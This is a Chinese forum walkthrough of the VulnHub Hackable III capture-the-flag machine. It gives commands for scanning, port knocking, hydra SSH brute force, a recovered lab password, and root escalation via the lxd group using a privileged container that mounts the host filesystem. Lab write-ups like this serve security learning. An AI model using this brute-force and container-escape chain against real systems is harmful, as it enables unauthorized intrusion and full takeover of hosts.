【vulhub系列】Hackable_ III靶机攻略!

山屿云   ·   发表于 2023-08-01 14:49:19   ·   CTF&WP专版

靶机描述

靶机地址:https://download.vulnhub.com/hackable/hackable3.ova

Description

  1. Focus on general concepts about CTF
  2. Difficulty: Medium
  3. This works better with VirtualBox rather than VMware.

信息收集

nmap探测详细端口信息

  1. nmap -sS -sV -A -p- 192.168.56.106

探测到了robots.txt

Web发现

查看页面源代码发现

发现了登录地址login_page/login.html,还有一个用户名jubiscleudo,还提示了端口敲门

  1. 端口敲门(端口碰撞)技术是一种通过在一组预先指定的关闭端口上产生连接请求,从外部打开防火墙上的端口的方法。一旦收到正确的连接请求序列,防火墙规则就会被动态修改,以允许发送连接请求的主机通过特定端口进行连接。也就是说,攻击者可能通过端口扫面来利用一些端口服务来发动攻击,但是一些固定的端口又需要开放来满足远程维护需求,因此,我们可以使用端口碰撞技术来形成一个访问控制。我们需要去碰撞一个特定的端口序列,才能够打开我们想要访问的端口。

登录页面

查看下robots.txt

查看/config

有一个1.txt

base64解码得到:10000,应该是端口敲门的端口之一

目录扫描

  1. dirsearch -u http://192.168.56.106/

访问一下http://192.168.56.106/backup/

发现一个密码本

访问css页面,发现里面有个2.txt文件

Brainfuck解码

访问登录页面 http://192.168.56.106/login.php,查看源码

访问一下3.jpg

图片隐写

看完了总结一下端口信息:4444、10000、65535

SSH登录

按照文件名的顺序进行端口敲门10000、4444、65535

  1. knock 192.168.56.106 10000 4444 65535
  2. nmap -A -p- 192.168.56.106

ssh打开后,用我们之前发现的用户名jubiscleudo,和发现的字典进行爆破

hydra -l jubiscleudo -P wordlist.txt 192.168.56.106 ssh

ssh登录

提权

查看下系统内的文件

逐个访问目录,在访问/var/www/html下有隐藏文件.back_config.php,打开后得到hackable_3密码

hackable_3/TrOLLED_3

切换用户

通过id命令可以看到该用户在lxd组中(lxd和docker一样,是一种容器)

参考:https://book.hacktricks.xyz/linux-hardening/privilege-escalation/interesting-groups-linux-pe/lxd-privilege-escalation

由于靶机不出网,需要本地下载Alpine镜像

  1. git clone https://github.com/saghul/lxd-alpine-builder.git
  2. cd lxd-alpine-builder
  3. ./build-alpine

生成.tar.gz文件,打开server服务,传输给目标机

python -m SimpleHTTPServer

目标机获取镜像,将其以镜像的形式添加进LXD

  1. wget http://192.168.75.150:8000/alpine-v3.16-x86_64-20220920_2354.tar.gz
  2. lxc image import ./alpine-v3.16-x86_64-20220920_2354.tar.gz --alias myimage
  3. lxc image list
  4. .tar.gz文件是根据时间生成的,需要根据自己情况更改名称,--alias后的名称也可以自己定义

初始化Container,否则在加载容器时会显示没有存储池

lxd init
一路回车

执行如下命令,成功提权

  1. lxc init myimage ignite -c security.privileged=true
  2. lxc config device add ignite mydevice disk source=/ path=/mnt/root recursive=true
  3. lxc start ignite
  4. lxc exec ignite /bin/sh

获取flag

用户名金币积分时间理由
Track-魔方 300.00 0 2023-09-07 21:09:44 深度 100 普适 100 可读 100

打赏我,让我更有动力~

1 条回复   |  直到 2023-9-7 | 392 次浏览

Track-魔方
发表于 2023-9-7

这种链接在复制的时候还是要注意下格式问题

评论列表

  • 加载数据中...

编写评论内容
登录后才可发表内容
返回顶部 投诉反馈

© 2016 - 2024 掌控者 All Rights Reserved.